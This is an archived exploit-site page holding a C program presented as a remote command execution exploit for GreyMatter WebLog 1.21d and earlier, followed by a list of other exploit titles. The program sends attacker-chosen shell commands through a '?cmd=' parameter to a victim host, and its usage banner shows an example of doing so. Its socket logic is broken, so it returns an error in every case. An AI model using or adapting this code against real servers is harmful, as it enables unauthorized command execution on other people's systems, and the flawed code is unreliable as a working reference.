exploits , vulnerabilities , articles , GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)

2006-03-28 GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)

2006-03-28

GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)

Rated as : High Risk

#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#define RETCONNERR            4                        // Connection
error
#define RETSOCKERR            3                        // Return for
socket error
#define RETRESVERR            2                        // Error code for
cannot resolve host
#define RETOK                 1                        // Return OK
#pragma comment(lib,"wsock32")
#define portnum 80
int info(char *ls1);
int ConnectWithString(char *hostname,char *string);
int main(int argc,char **argv){
    char buff[512]="";
    char get[1024]="";
    if(argc<3)
        {
            info(argv[0]);
            return 0;
        }
    strcpy(buff,argv[2]);
    strcat(buff,"?cmd=");
    strcat(buff,argv[3]);
    strcpy(get,"GET ");
    strcat(get,buff);
    strcat(get," HTTP/1.1");
    printf("%s\n",get);
    ConnectWithString(argv[1],get);
    return 0;
}
int ConnectWithString(char *hostname,char *string)
{
    // Socket handle
    WSADATA wsda;

    // Socket file descriptor
    int sockfd;

    // host entrie
    struct hostent *h;

    // Server struct
    struct sockaddr_in server;

    // Return value
    int ret;

    // Initialize socket
    WSAStartup(0x0101, &wsda);

    // Open a socket
    // Create tcp socket
        if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
            return RETSOCKERR;

    // Cannot create socket if anything fails
    else
        return RETSOCKERR;

    // Resolve host
    if((h=gethostbyname(hostname)) == NULL)
            return RETRESVERR;

    // Init server struct
    server.sin_addr=*((struct in_addr*)h->h_addr);
    server.sin_port=htons(portnum);
    server.sin_family=AF_INET;

    // Connect with server
    if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr))
== -1)
        return RETCONNERR;

    // Send string
    ret = send(sockfd, string, strlen(string), 0);

    // Check for socket error
    if(ret == SOCKET_ERROR)
        return RETSOCKERR;

    // Cleanup socket
    WSACleanup();

    closesocket(sockfd);

    // Everything OK

    return RETOK;
}
int info(char *ls1){
   
printf("******************************************************************\n");
    printf("*          GREYMATTER Exploit  private version           
       *\n");
    printf("*         Exploit By:No_Face_King Bug By:syst3m_f4ult    
       *\n");
    printf("*    www.crouz.com Great iranian security team           
       *\n");
    printf("*      Usage: %s VictimIP  GREYMATTER Path  command 
*\n",ls1);
    printf("*   e.g: %s 192.168.0.1  /00000008.php  uname -a    
*\n",ls1);
   
printf("******************************************************************\n");
    return 0;
}
securitydot.net - 2006-03-28

Exploits - newest 10 RSS | More

2007-06-15 38446 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23886 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit